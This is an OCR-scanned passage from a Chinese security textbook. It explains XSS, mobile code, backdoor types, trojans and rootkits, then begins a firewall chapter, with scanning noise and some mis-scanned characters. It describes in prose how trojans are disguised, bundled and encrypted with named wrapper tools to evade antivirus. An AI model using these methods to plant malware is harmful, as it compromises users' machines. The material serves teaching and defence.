Cookie 里 保存 的 信息 依旧 以 这 种 模式 显示 。 

用 Cookie 在 访问 者 的 工作 站 中 保存 少量 数据 为 网 站 的 开发 人 员 提 供 了 很 多 方便 ,但 同 
时 也 为 攻击 者 提供 了 方便 ,他 们 有 机 会 完全 接管 一 个 已 确立 的 与 远程 站 点 的 会 话 。 

4) 跨 网 站 脚本 攻击 

攻击 者 进行 跨 网 站 脚本 攻击 时 ,就 会 对 一 个 易 攻 击 的 网 站 注入 恶意 代码 ,结果 浏览 器 的 使 
用 者 就 在 不 知 不 觉 中 执行 了 这 种 代码 。 这 样 的 代码 往往 是 以 脚本 文件 的 形式 存在 ,并 且 通 常 
被 配置 成 用 来 窃取 Web 站 点 设置 的 Cookie 或 其 他 与 被 攻击 浏览 器 相关 的 Cookies。 与 此 相关 
的 浏览 器 ,其 脚本 来 源 于 被 授权 访问 的 Cookies 和 其 他 页 面 的 元 素 , 很 容易 将 控制 权 移交 给 攻 
击 者 。 跨 网 站 脚本 的 危害 波及 人 们 常用 的 搜索 引擎 ,论坛 .网 上 购物 和 金融 网 站 。 


2. 其 他 恶意 移动 代码 


1) ActiveX 

JavaScript 和 VBScript 允许 Web 服务 器 发 送 简单 的 脚本 给 Web 浏览 器 ,如 果 更 加 深 
入 地 了 解 Microsoft Windows 操作 系统 组 件 对 象 模型 (Component Object Model,COM) 的 
实现 过 程 ,这 种 模型 允许 一 个 应 用 程序 访问 另 一 个 应 用 程序 的 模块 和 功能 。ActiveX 控件 
是 一 类 特殊 的 COM 对 象 ,可 供 其 他 用 户 下 载 并 在 网 页 中 使 用 。 

ActiveX 是 编译 程序 ,一 旦 在 用 户 的 计算 机 上 运行 ,就 能 够 实现 一 个 正规 程序 在 
Windows 中 能 实现 的 每 一 个 功能 : 访问 文件 和 注册 表 .连接 网 络 以 及 调用 其 他 程序 等 。 

到 目前 为 止 ,不 管 是 在 执行 有 益 的 操作 ,还 是 在 引发 危害 方面 , ActiveX 控件 的 功能 都 
胜 过 浏览 器 脚本 的 能 力 。 

2) Java Applets 

Java Applets 是 一 段 用 Java 编写 的 可 嵌入 网 页 中 的 程序 。 像 ActiveX 控件 一 样 ,Java 
Applets 是 为 在 网 上 传送 而 设计 的 相对 小 的 程序 。 只 不 过 Java 由 Sun 公司 领导 ,直接 与 
Microsoft 支持 的 ActiveX 竞争 。 与 ActiveX 不 同 的 是 ,Java Applets 能 够 在 许多 操作 系统 
和 浏览 器 上 运行 ,ActiveX 是 完全 基于 Windows 的 技术 。 

3) 电子 邮件 中 的 移动 代码 

大 部 分 的 电子 邮件 客户 软件 ,例如 Outlook、 Mozilla Mail 中 都 包括 了 某 种 形式 的 Web 
浏览 器 功能 ,用 来 显示 HTML 格式 的 电子 邮件 信息 ,这 种 功能 通常 为 执行 嵌入 电子 邮件 信 
息 的 移动 代码 提供 了 支持 ,因此 ,前面 讲 的 许多 Web 浏览 器 攻击 技术 ,对 E-mail 客户 软件 
同样 适用 。 
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104 后 门 


后 门 是 一 个 允许 攻击 者 绕 过 系统 中 常规 安全 控制 机 制 的 程序 , 它 按照 攻击 者 自己 的 意 
愿 提供 通道 。 

例如 有 了 后 门 ,普通 用 户 可 能 需要 使 用 密码 或 者 智能 卡 之 类 的 设备 才能 进入 系统 ,而 了 
解 后 门 的 攻击 者 则 不 需要 提供 任何 口令 就 能 够 进入 系统 。 

许多 人 用 特洛伊 木马 或 简单 地 使 用 “特洛伊 "这 个 词 来 形容 每 个 后 门 ,实际 上 是 不 对 的 ， 
后 门 只 是 简单 提供 通路 ,也 就 是 一 个 程序 仅 提供 后 门 通道 ,那么 它 只 是 一 个 后 门 , 如 果 可 以 
伪装 成 一 个 有 用 的 程序 ,那么 它 便 是 特洛伊 木马 。 当 然 ,有 的 工具 可 以 同时 是 后 门 和 特洛伊 
木马 。 关 于 特洛伊 木马 将 在 后 一 小 节 讲 述 。 


1. 不 同类 型 的 后 门 


后 门 的 重点 在 于 为 攻击 者 提供 进入 目标 计算 机 的 通路 。 这 个 通路 可 以 表现 为 不 同形 
式 , 它 取决 于 攻击 者 的 目的 地 和 所 使 用 的 特定 后 门类 型 。 

(1) 本 地 权限 的 提升 : 这 类 后 门 使 得 对 系统 有 访问 权 的 攻击 者 突然 变换 权限 等 级 成 为 
管理 员 , 有 了 这 些 超级 用 户 权 限 , 攻 击 者 可 以 重新 设置 系统 或 访问 存储 在 系统 中 的 文件 。 

(2) 单个 命令 的 远程 执行 : 利用 这 种 类 型 的 后 门 ,攻击 者 可 以 向 目标 计算 机 发 送 消 息 。 
每 次 执行 一 个 单独 的 命令 ,并 且 返 回 输出 。 

(3) 远程 命令 行 访问 : 这 是 一 种 远程 的 shell(remote shell) ,这 种 类 型 的 后 门 允许 攻击 
者 通过 网 络 快速 直接 地 键入 受害 计算 机 的 命令 。 攻 击 者 可 以 利用 命令 行 工 具 所 有 的 操作 ， 
包括 执行 一 个 命令 集合 ,选择 一 些 文件 操作 。 远 程 shell 比 简单 的 单 命令 远程 执行 要 强大 得 
多 ,因为 它们 可 以 模拟 攻击 者 对 目标 计算 机 键盘 有 直接 访问 权 的 情况 。 

(4) 远程 控制 GUI: 这 是 最 彻底 的 远程 控制 ,可 以 让 攻击 者 看 到 目标 计算 机 的 桌面 ,看 
到 受害 者 对 计算 机 的 所 有 操作 和 内 容 。 同 时 攻击 者 能 够 控制 鼠标 的 移动 ,输入 对 键盘 的 操 
作 , 对 目标 计算 机 进行 最 彻底 的 监管 。 

无 论 后 门 提供 何 种 类 型 的 访问 ,这 些 方 法 的 重点 都 在 控制 ,使 攻击 者 可 以 控制 计算 机 ， 
一 切 都 通过 网 络 远程 实现 。 利 用 后 门 ,攻击 者 可 以 像 受害 计算 机 本 身 的 管理 员 一 样 对 其 进 
行 控制 ,并且 ,他 可 以 通过 Internet 在 全 世界 任何 地 方 实现 该 控制 。 


2. 安装 后 门 


为 了 实现 强大 的 功能 ,必须 首先 把 后 门 装 入 目标 计算 机 。 有 许多 可 选择 的 方法 ,例如 通 
过 缓冲 区 溢出 的 漏洞 或 者 典型 的 系统 错误 配置 ,也 可 以 利用 一 个 自动 化 的 程序 安装 后 门 , 例 
如 我 们 前 面 提 到 的 病毒 .蠕虫 和 恶意 移动 代码 。 

安装 后 门 的 另外 一 类 方法 是 欺骗 受害 者 使 之 自己 安装 ,他 们 可 能 会 通过 E-mail 向 受害 
者 发 一 个 程序 或 者 利用 远程 文件 共享 的 方式 将 这 样 的 程序 写 入 受害 者 的 硬盘 。 当 受害 者 在 
不 明 真相 的 情况 下 运行 了 这 样 的 程序 ,那么 后 门 就 在 不 知 不 觉 中 安装 进 了 目标 机 器 。 

后 门 是 在 安装 后 门 程序 用 户 允 许 的 前 提 下 运行 的 。 如 果 一 个 攻击 者 在 目标 系统 中 获得 
超级 用 户 权 限 ,攻击 者 安装 的 后 门将 以 超级 用 户 权限 运行 。 类 似 的 ,如 果 攻 击 者 只 能 欺骗 具 
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有 有 限 权 限 的 低级 用 户 安装 后 门 ,那么 攻击 者 对 于 该 目标 计算 机 而 言 ,也 就 只 有 这 个 用 户 所 
拥有 的 有 限 权 限 。 因 此 ,后 门 为 攻击 者 提供 的 对 该 系统 的 控制 取决 于 安装 此 后 门 的 用 户 的 
权限 等 级 。 


3. 自动 启动 后 门 


一 旦 攻击 者 问 入 了 系统 并 安装 了 后 门 ,通常 会 手动 激活 该 后 门 程序 。 然 而 , 当 攻 击 者 退 
出 计算 机 后 ,就 不 再 直接 控制 系统 。 所 以 攻击 者 通常 会 让 计算 机 定期 的 自动 重新 启动 后 门 ， 
特别 是 在 系统 启动 期 间 。 

1) 设置 Windows 后 门 启动 

Windows 具有 不 同 的 自动 程序 启动 能 力 ,攻击 者 可 以 将 一 个 可 执行 文件 或 脚本 的 名 字 
置 于 任意 一 个 不 同位 置 , 这 会 使 操作 系统 自动 启动 该 程序 。 通 常 来 讲 , Windows 提供 三 种 
类 型 的 机 制 用 于 自动 启动 恶意 代码 , 即 少数 的 自 启动 文件 或 者 文件 夹 ,注册 表 设 置 启动 和 预 
定 任务 。 

2) 设置 UNIX 后 门 启动 

主要 包括 增加 或 修改 系统 初始 化 脚本 、 修 改 Internet daemon(inetd) 配 置 、 转 换 用 户 环 
境 和 调度 作业 等 。 

为 了 防止 攻击 者 自动 启动 后 门 程序 ,用 户 需要 检查 各 种 各 样 的 自 启动 信息 和 注册 表 , 用 
手工 的 方式 非常 麻烦 ,有 一 些 自动 化 的 检测 工具 可 以 使 用 ,例如 Windows 环境 中 的 
AutoRun 免费 工具 , 它 可 以 自动 列 出 Windows NT/2000/XP 计算 机 中 所 有 的 自 启动 任务 。 
另外 还 有 Ionx Data Sentinel 等 工具 。 在 UNIX 系统 下 ,可 以 采用 Tripwire 免费 版 本 ,还 有 
开源 工具 AIDE 等 。 


4. GUI 后门 


攻击 者 一 般 通 过 后 门 远程 访问 命令 行 解释 器 。 这 种 方法 对 于 某 些 攻击 者 来 说 远 远 不 
够 ,他 们 希望 能 够 像 坐 在 受害 计算 机 前 面 一 样 , 操 作 系 统 控制 台 本 身 。 包 括 控制 GUI、 查 看 
受害 计算 机 的 屏幕 ,移动 鼠标 、 进 行 按钮 操作 等 。 为 了 实现 这 类 访问 ,攻击 者 利用 各 种 工具 ， 
对 目标 系统 的 GUI 进行 远程 监控 。 

这 些 工 具 都 包括 一 个 客户 端 和 一 个 服务 器 端 。 客 户 端 放 在 控制 者 的 计算 机 中 ,服务 器 
端 放置 在 被 控制 的 计算 机 中 ,控制 者 通过 客户 端 与 被 控制 计算 机 的 服务 器 端 建立 远程 连接 。 
一 旦 连接 建立 ,控制 者 就 可 以 对 被 控制 计算 机 发 送 指令 ,如 图 10-3 所 示 。 


= L | 
远程 控制 客户 端 远程 控制 服务 器 端 
(位 于 控制 者 计算 机 上 ) (位 于 被 控制 的 计算 机 上 ) 
图 10-3 远程 监控 


图 10-4 是 Radmin 在 实现 远程 控制 时 ,在 控制 端 看 到 的 被 控制 端的 GUI。 
并 非 所 有 的 GUI 远程 监控 都 是 恶意 的 。 事实 上 ,很 多 合法 的 商业 产品 允许 远程 用 户 、 
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系统 管理 员 使 用 用 户 计算 机 的 GUI。 表 10-3 列举 了 一 些 商业 公司 或 个 人 的 GUI 工具 。 合 
法 的 系统 管理 员 往 往 利 用 这 些 工具 非常 轻松 地 访问 远程 系统 ,使 之 可 以 通过 网 络 管理 计 


算 机 。 


Computer 


Programs 


<» Documents 


@ seting: 


Search 


图 10-4 运行 Radmin 监控 被 控制 端 


表 10-3 远程 访问 工具 


工 具 发 布 该 工具 的 组 织 操作 系统 支持 备 注 
Virtual Network Computing AT&T Laboratories Windows 免费 开源 
(VNC) Cambridge 
Windows Microsoft Windows Microsoft 旗舰 产品 ,针对 服 
Terminal Service 务 器 GUI 远程 访问 
Remote Desktop Service ”Microsoft Windows XP 和 2003 Windows Terminal Service 的 
分 离 版 本 
PCAnywhere Symantec Corporation Windows 目前 占据 了 相当 数量 的 市 场 
份额 ,比较 便宜 的 商业 工具 
DameWare DameWare Windows 商业 工具 ,商业 版 用 于 远程 管 
Development, LLC 理 ,免费 版 提供 部 分 功能 
GoToMyPC Expertcity, Inc. Windows 允许 通过 Internet, 利 用 浏览 
器 进行 远程 GUI 访 问 
Back Orifice 2000 Cult of the Dead Cow Windows 由 黑客 组 织 发 布 , 功 能 强大 
地 下 组 织 
SubSeven Mobman ,程序 员 Windows 至 今 为 止 最 流行 的 后 门 之 一 
Radmin Famatech 公司 Windows 远程 控制 软件 ,在 国内 比较 


流行 
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105 特洛伊 木马 


这 类 恶意 代码 是 根据 古 希 腊 神 话 中 的 木马 来 命名 的 , 它 从 表面 上 看 是 正常 的 程序 ,但 是 
实际 上 却 隐 含 着 恶意 意图 。 我 们 称 它 为 “特洛伊 木马 ”, 简 称 “ 木 马 ”。 

一 些 木马 程序 会 通过 覆盖 系统 中 已 经 存在 的 文件 的 方式 存在 于 系统 之 中 ,同时 它 可 以 
携带 恶意 代码 ,还 有 一 些 木马 会 以 一 个 软件 的 身份 出 现 ( 例 如 一 个 可 供 下 载 的 游戏 ) ,但 它 实 
际 上 是 一 个 窃取 密码 的 工具 。 这 种 木马 通常 不 容易 被 发 现 ,因为 它 一 般 是 以 一 个 正常 的 应 
用 的 身份 在 系统 中 运行 的 。 特 洛 伊 木 马 可 以 分 为 以 下 三 种 模式 : 

(1) 通常 潜伏 在 正常 的 程序 应 用 中 ,附带 执行 独立 的 恶意 操作 。 

(2) 通常 潜伏 在 正常 的 程序 应 用 中 ,但 是 会 修改 正常 的 应 用 进行 恶意 操作 。 

(3) 完全 覆盖 正常 的 程序 应 用 ,执行 恶意 操作 。 

需要 明确 的 是 ,不 能 直接 把 上 一 小 节 提 到 的 各 种 远程 控制 的 工具 简单 看 做 特洛伊 木马 。 
如 果 一 个 程序 仅仅 提供 远程 访问 ,那么 它 就 只 是 一 个 后 门 。 如 果 攻 击 者 把 这 些 工具 伪装 成 
某 些 其 他 良性 程序 时 , 才 是 真正 的 特洛伊 木马 。 实 际 上 ,大 多 数 木马 都 对 后 门 进 行 伪装 ,使 
木马 的 控制 者 登录 到 被 感染 计算 机 上 ,并 拥有 绝 大 部 分 的 管理 员 级 控制 权限 。 

通常 木马 所 具备 的 另 一 个 功能 是 发 动 拒绝 服务 攻击 。 

还 有 一 些 木马 不 具备 远程 登录 的 功能 。 它 们 的 存在 只 是 为 了 隐藏 恶意 进程 的 痕迹 , 例 
如 使 恶意 进程 不 在 进程 列表 中 显示 出 来 。 另 一 些 木马 用 于 收集 信息 ,例如 被 感染 计算 机 的 
密码 ; 木马 还 可 以 把 收集 到 的 密码 列表 发 送 到 互联 网 中 一 个 指定 的 邮件 账户 中 。 


1. 修改 名 字 


一 种 最 简单 的 特洛伊 木马 是 通过 在 Windows 计算 机 中 的 程序 名 和 扩展 名 之 间 加 入 空 
格 ,为 恶意 程序 赋予 一 个 良性 程序 的 名 字 ,使 它 不 被 管理 员 发 现 。 

例如 * 我 的 文件 . txt. exe”, 由 于 有 时 候 用 户 设置 为 不 显示 扩展 名 ,这 个 特洛伊 木马 在 计 
算 机 里 面 的 显示 则 为 “我 的 文件 . txt”, 让 用 户 以 为 它 只 是 一 个 文本 文件 ,欺骗 他 们 执行 这 些 
可 执行 文件 。 不 过 这 种 方法 对 于 有 经 验 的 用 户 来 说 已 经 不 太 实用 了 。 

另外 攻击 者 会 创建 另外 一 个 文件 和 程序 ,该 程序 与 安装 在 这 台 计 算 机 上 的 一 个 程序 具 
有 完全 相同 的 名 字 。 例 如 在 Windows 系统 的 任务 管理 器 中 ,如 果 发 现 两 个 iexplore 进程 ， 
有 可 能 其 中 一 个 是 木马 。 


2. 包装 工具 


攻击 者 会 把 两 个 或 者 多 个 可 执行 文件 打包 成 一 个 单独 的 软件 包 , 创 建 一 个 看 起 来 很 正 
常 的 软件 包 , 当 用 户 运行 这 个 软件 时 ,首先 会 安装 恶意 的 代码 ,然后 才 执行 正常 代码 。 绝 大 
多 数 的 恶意 软件 在 屏幕 上 没有 任何 显示 ,所 以 受害 者 往往 觉察 不 到 。 例 如 ,攻击 者 可 能 把 一 
个 远程 控制 软件 和 一 个 小 游戏 捆绑 在 一 起 , 当 用 户 运 行 这 个 小 游戏 的 时 候 ,首先 运行 了 远程 
控制 软件 的 服务 器 端 ,然后 才 开 始 游戏 。 通 过 包装 工具 在 正常 程序 里 面 加 入 恶意 代码 的 过 
程 如 图 10-5 所 示 。 

攻击 者 会 使 用 一 个 包装 工具 将 两 个 可 执行 程序 结合 在 一 起 ,甚至 不 用 写 一 行 代码 就 可 
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一 个 正常 程序 一 
包装 工具 结果 程序 


图 10-5 通过 包装 工具 在 正常 程序 里 面 加 入 恶意 代码 


以 创建 一 个 特洛伊 木马 。 例 如 EliteWrap ,这 个 工具 可 以 将 一 个 或 者 多 个 可 执行 文件 结合 
到 一 起 。 更 有 其 者 ,有 些 包 装 工具 甚至 可 以 对 包装 后 的 恶意 代码 进行 加 密 , 使 得 目标 计算 机 
上 的 防 病毒 软件 更 难 识别 恶意 代码 ,例如 AFX File Lace。 

为 了 保护 系统 不 受 这 种 特洛伊 木马 的 攻击 ,用 户 可 以 首先 检查 软件 的 大 小 ,一 般 来 说 ， 
加 入 了 恶意 代码 的 软件 占用 的 字 节 数 会 变 大 。 当 然 ,最 可 靠 的 办 法 还 是 用 防 病毒 软件 检查 
一 下 。 


3. 特洛伊 软件 发 布 


攻击 者 把 软件 下 载 作 为 攻击 目标 ,用 来 发 布 特 洛 伊 木马 。 他 们 攻击 用 于 软件 发 布 的 
Internet 站 点 ,然后 将 一 个 特洛伊 木马 伪装 成 正常 程序 放置 到 站 点 里 供用 户 下 载 。 这 种 方 
法 使 特洛伊 木马 更 为 广泛 地 传播 。 每 个 下 载 并 安装 了 这 个 软件 的 人 都 会 受到 攻击 。 

2002 年 ,当时 流行 的 嗅 探 程序 Tcpdump 在 主要 的 Tcpdump Web 站 点 被 蔡 换 成 特洛伊 
木马 后 门 。 具 有 讽刺 意味 的 是 ,Tcpdump 是 一 个 安全 工具 ,所 以 很 多 安全 从 业 人 员 的 计算 
机 里 也 被 安装 了 一 个 后 门 。 

为 了 防御 这 样 的 攻击 ,一 方面 ,用 户 应 该 在 正规 网 站 上 下 载 软件 ,因为 攻击 一 个 知名 网 
站 比 建立 一 个 假 的 下 载 网 站 要 困难 得 多 。 另 外 ,有 些 软件 在 发 布 的 时 候 提供 了 软件 的 Hash 
值 ,一 般 为 128 位 或 者 160 位 。 在 下 载 到 软件 后 ,利用 Hash 值 生成 工具 对 软件 重新 计算 
Hash 值 ,和 发 行 时 厂商 提供 的 Hash 值 相 比较 ,如 果 相 同 , 则 表示 软件 没有 被 修改 过 ,如 果 
不 同 , 则 很 有 可 能 被 加 入 了 恶意 代码 。 


4. 源 代码 中 的 特洛伊 


也 许 最 令 人 担心 的 特洛伊 木马 携带 者 是 那些 在 发 布 之 前 就 已 经 被 插入 恶意 代码 的 软件 
产品 。 如 果 攻 击 者 就 职 于 软件 开发 公司 或 人 侵 了 这 样 的 公司 ,他 们 就 有 机 会 在 一 个 产品 的 
源码 中 植 和 特洛伊 木马 ,用 恶意 软件 感染 毫 无 戒备 的 用 户 。 

Ken Thompson, 著 名 的 UNIX 系统 创造 者 之 一 和 C 语言 大 师 在 1984 年 发 表 的 
Reflections on Trusting Trust 的 论文 中 ,讨论 了 控制 源 代码 的 重要 性 和 在 源 代 码 中 植 入 后 
门 的 可 能 性 。 在 那 篇 经 典 的 论文 中 ,Thompson 描述 了 通过 修改 一 个 编译 器 的 源 代码 ,使 该 
编译 器 对 它 编 译 过 的 所 有 代码 创建 一 个 后 门 的 方法 。 

这 个 问题 比 起 上 一 节 讨 论 的 为 软件 站 点 植 人 特洛伊 木马 更 加 严重 。 当 攻击 者 在 软件 发 
行 站 点 植 人 木马 时 ,该 软件 的 开发 人 员 至 少 还 有 一 份 这 个 软件 的 “干净 ”版 本 。 还 可 以 用 来 
替换 被 修改 过 的 版 本 。 如 果 在 软件 开发 过 程 中 就 植 人 木马 的 话 , 软 件 厂商 甚至 连 一 份 未 经 
感染 的 软件 都 没有 。 如 果 攻 击 者 足够 聪明 , 它 可 能 会 在 正常 的 代码 中 遍布 不 显眼 的 小 后 门 ， 
这 时 的 根除 后 门 的 工作 十 分 困难 。 软 件 开发 人 员 不 得 不 扫描 大 量 的 代码 ,来 确保 整个 产品 
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的 完整 性 。 

由 于 当今 软件 巨大 的 复杂 性 和 测试 的 局 限 性 ,以 及 软件 开发 朝 着 全 球 化 方向 发 展 , 这 些 
都 使 这 一 趋势 愈加 恶化 。 为 了 防御 这 种 攻击 模式 ,要 确保 系统 环境 下 使 用 的 软件 都 具有 功 
能 强大 的 完整 性 控制 和 测试 体制 ,只 有 依靠 彻底 的 质量 监督 过 程 和 对 源 代码 的 控制 ,才能 够 
改善 这 种 源 代码 不 可 信任 的 状态 。 
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前 面 讲 到 的 后 门 和 特洛伊 木马 都 是 由 攻击 者 添加 到 系统 中 的 新 软件 ,不 会 蔡 换 或 修改 
受害 者 系统 的 组 件 , 这 些 木 马 和 后 门 每 一 个 都 作为 一 个 单独 的 程序 在 系统 中 运行 。 而 
RootKit 却 是 通过 控制 目标 计算 机 操作 系统 软件 中 的 关键 组 件 来 获取 某 些 权限 并 且 隐 藏 在 
系统 中 。 在 本 节 ,我 们 给 出 的 RootKit 的 定义 如 下 : 

RootKit 是 一 种 特洛伊 木马 工具 ,通过 修改 现 有 的 操作 系统 软件 ,使 攻击 者 获得 访问 权 
并 隐藏 在 计算 机 中 。 但 是 它 和 传统 的 特洛伊 木马 又 有 区 别 : 它 获取 运行 在 目标 计算 机 上 与 
操作 系统 相关 联 的 常规 程序 ,用 恶意 版 本 替代 它们 。 

例如 ,攻击 者 可 以 用 RootKit 替换 dir 命令 。 标 准 的 dir 命令 用 来 列 出 一 个 目录 中 内 
容 ,而 经 过 替换 后 ,输入 dir, 则 后 果 是 除了 列 出 目录 中 内 容 , 还 完成 了 其 他 恶意 的 行为 。 另 
外 还 有 UNIX 中 的 ls 命令 也 容易 被 替换 。sshd(secure shell server) 命 令 用 来 实现 经 过 加 
密 和 强 验证 的 远程 访问 ,经 过 替换 后 ,新 版 本 允许 普通 用 户 像 往常 一 样 登录 ,而 且 允 许 攻 击 
者 用 后 门口 令 潜入 系统 。 

RootKit 出 现 于 20 世纪 90 年 代 初 ,在 1994 年 2 月 的 一 篇 安全 咨询 报告 中 首先 使 用 了 
RootKit 这 个 名 词 。 这 篇 安全 咨询 就 是 CERT-CC 的 CA-1994-01, 题目 是 Ongoing 
Network Monitoring Attacks, 最 新 的 修订 时 间 是 1997 年 9 月 19 日 。 这 个 词 源 于 UNIX 系 
统 中 的 超级 用 户 账 号 。 从 出 现 至 今 ,RootKit 的 技术 发 展 非常 迅速 ,应 用 越 来 越 广泛 ,检测 
难度 也 越 来 越 大 。 

RootKit 没有 特别 恰当 的 中 文 翻译 ,虽然 也 有 人 按 字面 翻译 成 管理 员工 具 包 ,但 是 这 个 
说 法 完全 不 能 说 明 其 作用 ,甚至 会 造成 歧义 。 因 为 RootKit 本 身 就 不 是 管理 员 希 望 看 到 的 
东西 。 所 以 一 般 的 书籍 和 文献 中 ,都 直接 用 其 英文 名 称 RootKit。 

RootKit 可 以 运行 在 两 个 不 同 的 层次 上 ,这 取决 于 它 蔡 换 和 修改 了 目标 系统 中 的 哪 种 
软件 。 如 果 替 换 或 者 修改 了 系统 中 现 有 的 二 进 制 可 执行 文件 或 者 库 文件 ,我们 称 之 为 用 户 
模式 RootKit(user-mode RootKit) ,因为 它 控制 的 是 操作 系统 用 户 级 组 件 ,通常 被 RootKit 
替换 的 系统 程序 有 login ifconfig .du find ls、netstart ps 等。 如 果 替 换 和 修改 的 是 操作 系 
统 的 内 核 部 分 , 则 称 为 内 核 模式 RootKit(kernel-mode RootKit) ,内 核 级 RootKit 使 攻击 者 
获得 对 系统 底层 的 完全 控制 权 。 攻 击 者 可 以 修改 系统 内 核 , 大 多 数 内 核 级 RootKit 都 能 进 
行 执行 重 定 向 , 即 截获 运行 某 一 程序 的 命令 ,将 其 重 定向 到 入 侵 者 所 选中 的 程序 并 运行 此 程 
序 。 也 就 是 说 用 户 或 管理 员 要 运行 程序 A, 被 修改 过 的 内 核 假装 执行 A ,实际 却 执行 了 程 
序 B。 

图 10-6 是 普通 的 特洛伊 木马 后 门 和 用 户 模式 RootKit 的 比较 ,应 用 程序 级 特洛伊 木马 
为 应 用 程序 级 恶意 软件 。 使 用 这 样 的 工具 ,有 害 的 应 用 程序 允许 攻击 者 访问 ,目标 计算 机 底 


第 10 章 ”恶意 代码 分 析 


层 的 操作 系统 包括 各 种 各 样 的 程序 、 库 ,以 及 内 核 都 完好 无 损 。 而 用 户 模式 的 RootKit 则 可 
以 深入 系统 ,替换 目标 系统 的 可 执行 程序 ,例如 ls 和 sshd 和 各 种 共享 代码 库 。 这 些 替换 程 
序 看 上 去 完好 ,掩饰 了 系统 中 攻击 者 的 存在 。 


应 用 程序 级 特洛伊 木马 后 门 用 户 模式 RootKit 
善意 || 善意 善意 善意 特洛伊 、sshd || 特洛伊 善意 
程序 | 程序 || 函数 库 | 函数 库 程序 等 木马 库 || 函数 库 
内 核 内 核 


10-6 特洛伊 木马 后 门 和 用 户 模式 RootKit 的 比较 


RootKit 本 身 并 不 能 直接 获得 权限 ,而 是 在 入 侵 者 通过 各 种 方法 获得 权限 后 才能 使 用 
的 一 种 保护 权限 的 措施 ,在 获取 系统 根 权 限 (root 权限 ,是 UNIX 系统 的 最 高 权限 ,在 
Windows 下 为 administrator) 以 后 ,RootKit 提供 了 一 套 工 具 用 来 建立 后 门 和 隐藏 行 迹 ,从 
而 让 攻击 者 保住 权限 。 

普通 的 RootKit 通过 替换 系统 文件 来 保持 权限 安装 后 门 ,也 就 是 当 用 户 执行 这 些 命令 
的 时 候 , 实 际 上 执行 的 是 被 RootKit 修改 的 程序 。 

它 对 一 系列 操作 系统 均 有 效 ,但 主要 是 针对 UNIX 的 ,比如 Linux、AIX、SunOS 等 操作 
系统 。 其 中 针对 SunOS 和 Linux 两 种 操作 系统 的 RootKit 最 多 。 

为 了 获得 最 强大 的 破坏 力 ,许多 RootKit 由 众多 组 件 组 成 ,其 中 一 些 包 含 了 十 几 个 甚至 
更 多 不 同 程序 的 替换 者 ,还 包括 各 种 辅助 工具 ,用 来 调整 那些 被 替换 程序 的 特征 ,包括 程序 
大 小 和 上 次 修改 日 期 等 ,从 而 使 这 些 程序 看 上 去 是 正常 的 。 

防御 它 的 最 有 效 的 方法 是 定期 地 对 重要 系统 文件 的 完整 性 进行 核查 ,这 类 的 工具 很 多 ， 
像 Tripwire 就 是 一 个 非常 不 错 的 文件 完整 性 检查 工具 。 一 旦 发 现 文件 被 修改 ,必须 完全 重 
新 安装 所 有 的 系统 文件 部 件 和 程序 ,以 确保 安全 。 


防火 墙 是 目前 应 用 非常 广泛 且 效 果 良 好 的 信息 安全 技术 。 它 可 以 防御 网 络 中 的 各 种 威 
胁 , 并 且 做 出 及 时 的 响应 ,将 那些 危险 的 连接 和 攻击 行为 隔绝 在 外 。 从 而 降低 网 络 的 整体 
风险 。 

防火 墙 的 基本 功能 是 对 网 络 通信 进行 筛选 屏蔽 以 防止 未 授权 的 访问 进出 计算 机 网 络 ， 
简单 地 概括 就 是 ,对 网 络 进行 访问 控制 。 绝 大 部 分 的 防火 墙 都 是 放置 在 可 信任 网 络 和 不 可 
信任 网 络 之 间 。 


11.1 防火 墙 的 原理 


1. 防火 墙 的 定义 


对 防火 墙 的 明确 定义 来 自 AT&T 的 两 位 工程 师 Willam Cheswick 和 steven 
Beellovin: 防火 墙 是 位 于 两 个 (或 多 个 ) 网 络 间 ,实施 网 间 访 问 控制 的 一 组 组 件 的 集合 , 它 满 
足以 下 条 件 : 

(1) 内 部 和 外 部 之 间 的 所 有 网 络 数据 流 必 须 经 过 防火 墙 。 

(2) 符合 安全 政策 的 数据 流 才 能 通过 防火 墙 。 

(3) 防火 墙 自身 能 抗 攻 击 。 

在 建筑 上 ,防火墙 被 设计 用 来 防止 火势 从 建筑 物 的 一 部 分 草 延 到 另 一 部 分 。 网 络 防火 
墙 防止 外 部 网 络 的 损失 波及 内 部 网 络 , 它 就 像 在 网 络 周围 控 了 一 条 护城河 ,在 唯一 的 桥 上 设 
立 了 安全 哨所 ,进出 的 行人 都 要 接受 安全 检查 。 由 于 防火 墙 的 地 位 和 作用 是 处 于 网 络 边界 
的 位 置 , 它 可 以 由 硬件 ,软件 或 它们 的 相互 结合 来 具体 实现 。 

防火 墙 用 于 保护 可 信和 网 络 免 受 非 可 信和 网 络 的 威胁 ,同时 , 仍 允 许 双方 通信 。 目 前 ,许多 
防火 墙 都 用 于 Internet 和 内 部 网 之 间 ( 如 图 11-1 所 示 ) ,同时 在 任何 网 间 和 企业 网 内 部 均 可 


使 用 防火 墙 。 
于 


防火 墙 
图 11-1 防火 墙 示意 
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可 以 把 防火 墙 看 做 是 在 可 信任 网 络 和 不 可 信任 网 络 之 间 的 一 个 缓冲 系统 , 它 可 以 是 一 
台 有 访问 控制 策略 的 路 由 器 ,或 者 一 台 多 个 网 络 接口 的 计算 机 、 也 可 以 是 安装 在 某 台 特定 机 
器 上 的 软件 。 它 被 配置 成 保护 指定 网 络 , 使 其 免 受 来 自 于 非 信 任 网 络 区 域 的 某 些 协议 与 服 
务 的 影响 。 所 以 一 般 情 况 下 防火 墙 都 位 于 网 络 的 边界 ,例如 保护 企业 网 络 的 防火 墙 往往 部 
署 在 内 部 网 络 到 外 部 网 络 的 核心 区 域 上 。 


2. 防火 墙 的 基本 功能 


早期 的 防火 墙 主要 用 来 提供 服务 控制 ,现在 已 经 扩展 为 多 种 服务 ,还 包括 方向 控制 .用 
户 控 制 ,行为 控制 等 。 

服务 控制 : 确定 哪些 服务 可 以 被 访问 。 

方向 控制 : 对 于 特定 的 服务 ,可 以 确定 允许 哪个 方向 能 够 通过 防火 墙 。 

用 户 控 制 : 根据 用 户 来 控制 对 服务 的 访问 。 

行为 控制 : 控制 一 个 特定 的 服务 的 行为 。 

防火 墙 成 为 了 与 不 可 信任 网 络 进行 联络 的 唯一 纽带 ,我 们 通过 部 署 防火 墙 , 就 可 以 通过 
关注 防火 墙 的 安全 来 保护 其 内 部 的 网 络 安全 。 并 且 所 有 的 通信 流量 都 通过 防火 墙 进 行 审计 
和 保存 ,对 于 网 络 安全 犯罪 的 调查 取证 提供 了 依据 。 总 之 ,防火 墙 减轻 了 网 络 和 系统 被 用 于 
非法 和 恶意 目的 的 风险 。 


3. 防火 墙 的 实施 策略 


